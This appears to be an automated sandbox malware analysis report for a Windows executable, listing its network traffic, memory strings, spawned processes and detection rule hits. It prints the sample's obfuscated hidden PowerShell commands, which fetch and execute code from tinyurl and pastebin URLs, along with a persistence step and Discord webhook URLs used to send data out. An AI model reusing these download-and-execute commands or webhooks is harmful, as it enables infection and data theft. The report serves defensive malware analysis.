Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: tinyurl.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: unknown | HTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 216 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:08:33 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729001314 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LOOe4xbhUtxpb4QqymtypeX0J4MY2HoX0R64P0lynOZa%2FqywR3hPeseHLJW%2FW2fOhw179RpID%2FZfcGuEkDiFH09lT7yACLJQoOL9oByhy%2BZlrBmAxow67x9Ogjhs"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=071caa7cf962937357e114a6e27d75dfa742eb30-1729001313; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=NcUK2lEgjsnxvrHiCU4VknYATx8I.UozHHWRfgF.gfk-1729001313478-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3061c0ad916b5f-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:08:45 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729001327 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pSkkG8F3pujVaSVtAZIfG9Ht4OEei7Zmhhany3VCo55doCiXyXcD1SO%2FNDaW%2BPKChxlEjfMmFJgxwKns8obO%2Bct5hzfVIQdZtKEBO5ADYUdqCSyz2EyLB0QA1eEg"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=6037ab852f611d9c59da53270f9ef9f7968de046-1729001325; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=ISHjpiQsrSxXfPR9ENjK_tyB.Jn36.Se.X6qJjfRW80-1729001325730-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d30620d3f354750-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:08:53 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729001335 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2BaLmMdDzGUHXS%2F5%2FOVkC%2BecgwBoqf6IlMnSk0nEi1bkArecnSldedeFAa%2F2Cz9pGCUB2fOVHfAPaF4dksBXiSRfh3Egn6wUrw%2F7MuuOnEvWaIAcsKpIsXQDY3tn"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=3cc8826b8e129a25e091786ff5323dda09268d5c-1729001333; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=l0qBvyRSAKsNlkkIOvi66k6mtMXweaE6.S7EcWQGQu8-1729001333690-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d30623eec3f463e-DFW
Source: powershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD118D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD11E42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000E.00000002.2082988609.0000021080508000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080AF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000E.00000002.2082988609.0000021080AF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080085000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2001538441.000001FD1141B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD11430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.000002108005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080025000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: powershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080BA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000000E.00000002.2082988609.0000021080BA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000009.00000002.2001538441.000001FD118D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080508000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD11E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080AF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD11E42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49719 version: TLS 1.2

System Summary

Source: amsi64_5632.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_5336.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5632, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4AE2B966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4AE2C712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4AE2D1B1
Source: vF20HtY4a4.exe | Static PE information: No import functions for PE file found
Source: vF20HtY4a4.exe, 00000000.00000000.1460079281.000001FD048B2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameOrigami.exe0 vs vF20HtY4a4.exe
Source: vF20HtY4a4.exe | Binary or memory string: OriginalFilenameOrigami.exe0 vs vF20HtY4a4.exe
Source: amsi64_5632.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_5336.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5632, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal92.troj.evad.winEXE@19/14@4/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbt0tg1a.xkx.ps1
Source: vF20HtY4a4.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vF20HtY4a4.exe | Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: vF20HtY4a4.exe | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Users\user\Desktop\vF20HtY4a4.exe "C:\Users\user\Desktop\vF20HtY4a4.exe"
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
